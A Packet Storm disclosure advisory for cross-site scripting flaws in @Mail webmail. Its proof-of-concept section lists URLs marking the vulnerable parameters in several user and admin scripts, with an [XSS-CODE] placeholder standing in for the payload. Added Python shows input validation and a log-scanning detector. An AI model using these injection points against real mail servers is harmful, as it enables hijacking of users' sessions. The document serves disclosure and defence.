atmailXSS.txt

2005-07-28T00:00:00
ID PACKETSTORM:38947
Type packetstorm
Reporter Lostmon
Modified 2005-07-28T00:00:00

Description

#############################################
@Mail multiple variable cross-site scripting  
vendor url: http://www.atmail.com
Advisory: http://lostmon.blogspot.com/2005/07/mail-multiple-variable-cross-site.html
vendor notify: yes    exploit available: yes
##############################################  
  
  
@Mail is a feature-rich email solution that allows users to access
email resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s).
  
  
@Mail contains a flaw that allows a remote cross-site scripting
attack. This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts. This could
allow a user to create a specially crafted URL that would execute
arbitrary script code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
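The defect class described above is a CGI script reflecting a request variable into its HTML response without validating or encoding it. The following Python example (added here for illustration; it is not @Mail's code, which is Perl and not reproduced on this page) shows the unsafe reflection next to a hardened version for the printcal.pl parameters named later in this advisory (year, month, type). The accepted set of type values and the page layout are assumptions; the real scripts may differ.

```python
import html
import re
from urllib.parse import parse_qs

# Assumption for this example: printcal.pl accepts only these view types.
# The real @Mail scripts are not on the page, so the set is illustrative.
ALLOWED_TYPE = {"1", "2", "3", "4"}


def parse_query(qs: str) -> dict:
    """First value of each query parameter, blanks kept (as a CGI script sees them)."""
    return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}


def vulnerable_render(qs: str) -> str:
    """Reflects raw query values straight into HTML: the defect the advisory reports."""
    p = parse_query(qs)
    return "<h1>Calendar %s/%s (type %s)</h1>" % (
        p.get("year", ""), p.get("month", ""), p.get("type", ""))


def validate_calendar(p: dict) -> dict:
    """Strict allow-list validation for year/month/type; raises ValueError otherwise."""
    year, month, typ = p.get("year", ""), p.get("month", ""), p.get("type", "")
    if not re.fullmatch(r"\d{4}", year):
        raise ValueError("year must be four digits")
    if not re.fullmatch(r"\d{1,2}", month) or not 1 <= int(month) <= 12:
        raise ValueError("month must be 1-12")
    if typ not in ALLOWED_TYPE:
        raise ValueError("type not in allowed set")
    return {"year": int(year), "month": int(month), "type": int(typ)}


def safe_render(qs: str) -> str:
    """Validate first; on failure emit a fixed error page that never echoes the input.
    Values reaching the template are integers and are still HTML-escaped on output."""
    try:
        v = validate_calendar(parse_query(qs))
    except ValueError as exc:
        return "<p>Invalid calendar request: %s</p>" % html.escape(str(exc), quote=True)
    return "<h1>Calendar %s/%s (type %s)</h1>" % tuple(
        html.escape(str(x), quote=True) for x in (v["year"], v["month"], v["type"]))


def safe_compose_field(value: str) -> str:
    """Free-text address fields (To/Cc/Bcc) cannot be reduced to an allow-list,
    so the defence there is output encoding: escape every character that HTML
    markup or attribute delimiters treat specially."""
    return html.escape(value, quote=True)
```

Both halves matter: the allow-list rejects anything that is not a plausible calendar request before it reaches a template, and the output encoding covers fields such as addresses where a fixed vocabulary is not possible.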
  
#############  
versions  
#############  
  
@Mail 4.03 WebMail for Windows   
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /  
  
It is also possible that other versions are vulnerable.
  
  
#################  
Timeline  
#################  
  
Discovered: 2-07-2005
vendor notify: 27-07-2005
vendor response: 28-07-2005
disclosure: 28-07-2005
  
  
##################  
Proof of concept
##################  
  
Exploiting these flaws requires a client login, and exploiting
the flaws in /webadmin/ requires an admin login.
  
###################  
printcal.pl
###################  
  
http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4  
  
http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]  
  
http://[victim]/printcal.pl?type=4[XSS-CODE]  
  
###################  
task.pl  
###################  
  
http://[victim]/task.pl?func=todo[XSS-CODE]  
  
###################
compose.pl
###################
  
http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.[victim].com%3A2%2C&folder=Sent&cache=&func=reply&type=reply[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r

http://[victim]/compose.pl?func=new&To=lala@lala.es&Cc=&Bcc=[XSS-CODE]

http://[victim]/compose.pl?func=new&To=lala@lala.es&Cc=[XSS-CODE]&Bcc=

http://[victim]/compose.pl?func=new&To=lala@lala.es[XSS-CODE]&Cc=&Bcc=
  
###################  
webadmin/filter.pl  
###################  
  
http://[victim]/webadmin/filter.pl?func=viewmailrelay&Order=IPaddress[XSS-CODE]

http://[victim]/webadmin/filter.pl?func=filter&Header=blacklist_from&Type=1[XSS-CODE]&View=1

http://[victim]/webadmin/filter.pl?func=filter&Header=blacklist_from[XSS-CODE]&Type=1&View=1

http://[victim]/webadmin/filter.pl?func=filter&Header=whitelist_from&Type=0&Display=1&Sort=value[XSS-CODE]&Type=1&View=1
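Every request above leaves a trace in the web server's access log, so an administrator who cannot patch immediately can at least watch for attempts. The Python example below is added for illustration and is not part of the advisory or of @Mail; it scans constructed Apache-style log lines for requests to the four affected scripts whose decoded parameters contain markup characters, or whose numeric parameters (year, month, type, unique, HtmlEditor, View, Display) are not numeric. The log lines, the IP addresses and the parameter sets are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Scripts named in the advisory; any other path is ignored.
WATCHED_SCRIPTS = {"printcal.pl", "task.pl", "compose.pl", "filter.pl"}
# Parameters that, going by the advisory's URLs, carry only digits (assumption).
NUMERIC_PARAMS = {"year", "month", "type", "unique", "htmleditor", "view", "display"}
# Coarse indicator of HTML/attribute/script injection in a decoded value.
MARKUP_RE = re.compile(r"""[<>"']|javascript:|on\w+\s*=""", re.IGNORECASE)
# Apache combined/common log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log; none of these requests are real.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jul/2005:10:15:01 +0200] "GET /printcal.pl?year=2005&month=11&type=4 HTTP/1.1" 200 1532
10.0.0.9 - - [28/Jul/2005:10:15:07 +0200] "GET /printcal.pl?year=%3Cb%3Eprobe%3C%2Fb%3E&month=11&type=4 HTTP/1.1" 200 1601
10.0.0.9 - - [28/Jul/2005:10:15:12 +0200] "GET /task.pl?func=todo%22%3E HTTP/1.1" 200 988
10.0.0.5 - - [28/Jul/2005:10:16:30 +0200] "GET /compose.pl?func=new&To=lala%40lala.es&Cc=&Bcc= HTTP/1.1" 200 2210
10.0.0.9 - - [28/Jul/2005:10:17:02 +0200] "GET /webadmin/filter.pl?func=filter&Header=blacklist_from&Type=1abc&View=1 HTTP/1.1" 200 1744
10.0.0.7 - - [28/Jul/2005:10:18:00 +0200] "GET /index.html HTTP/1.1" 200 512
"""


def flag_request(line: str):
    """Return (client_ip, script, reasons) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    script = url.path.rsplit("/", 1)[-1]
    if script not in WATCHED_SCRIPTS:
        return None
    reasons = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # parse_qsl decodes once; a second pass also catches double-encoded values.
        value = unquote_plus(value)
        if MARKUP_RE.search(value):
            reasons.append(f"{name}: markup")
        elif name.lower() in NUMERIC_PARAMS and value and not value.isdigit():
            reasons.append(f"{name}: non-numeric")
    return (m.group("ip"), script, reasons) if reasons else None


def scan_log(text: str) -> list:
    """Run flag_request over every line and keep the hits, in log order."""
    hits = []
    for line in text.splitlines():
        hit = flag_request(line)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for ip, script, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {script}: {', '.join(reasons)}")
```

The check decodes before matching because the log stores the request as sent, and a legitimate client almost never URL-encodes angle brackets into a calendar year. Treat the markup pattern as a triage signal rather than proof: an apostrophe in a display name will trip it, so review hits against the rest of the session from the same client.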
  
  
  
######################## €nd ##########################  
  
Thanks to estrella for being my light

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....